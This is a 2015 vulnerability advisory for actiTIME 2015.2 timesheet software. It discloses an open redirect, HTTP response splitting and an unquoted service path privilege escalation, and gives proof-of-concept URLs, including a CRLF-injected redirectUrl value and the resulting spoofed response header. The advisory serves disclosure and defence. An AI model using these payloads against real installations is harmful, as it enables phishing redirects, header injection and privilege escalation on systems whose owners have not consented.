actiTIME 2015.2 Privilege Escalation / Open Redirect
Posted on 03 November 2015
actiTIME 2015.2 Multiple Vulnerabilities Vendor: Actimind, Inc. Product web page: http://www.actitime.com Affected version: 2015.2 (Small Team Edition) Summary: actiTIME is a web timesheet software. It allows you to enter time spent on different work assignments, register time offs and sick leaves, and then create detailed reports covering almost any management or accounting needs. Desc: The application suffers from multiple security vulnerabilities including: Open Redirection, HTTP Response Splitting and Unquoted Service Path Elevation Of Privilege. Tested on: OS/Platform: Windows 7 6.1 for x86 Servlet Container: Jetty/5.1.4 Servlet API Version: 2.4 Java: 1.7.0_76-b13 Database: MySQL 5.1.72-community-log Driver: MySQL-AB JDBC Driver mysql-connector-java-5.1.13 Patch level: 28.0 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5273 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5273.php 13.10.2015 -- 1. Open Redirect ----------------- http://localhost/administration/settings.do?redirectUrl=http://zeroscience.mk&submitted=1 2. HTTP Response Splitting --------------------------- http://localhost/administration/settings.do?redirectUrl=%0a%0dServer%3a%20Waddup%2f2%2e0&submitted=1 Response: HTTP/1.1 302 Moved Temporarily Date: Wed, 14 Oct 2015 09:32:05 GMT Server: Jetty/5.1.4 (Windows 7/6.1 x86 java/1.7.0_76 Content-Type: text/html;charset=UTF-8 Cache-Control: no-store, no-cache Pragma: no-cache Expires: Tue, 09 Sep 2014 09:32:05 GMT X-UA-Compatible: IE=Edge Location: http://localhost/administration/ Server: Waddup/2.0 Content-Length: 0 3. Unquoted Service Path Elevation Of Privilege ------------------------------------------------ C:Usersjoxy>sc qc actiTIME [SC] QueryServiceConfig SUCCESS SERVICE_NAME: actiTIME TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:Program Files (x86)actiTIMEactitime_access.exe startAsService LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : actiTIME Server DEPENDENCIES : actiTIME MySQL SERVICE_START_NAME : LocalSystem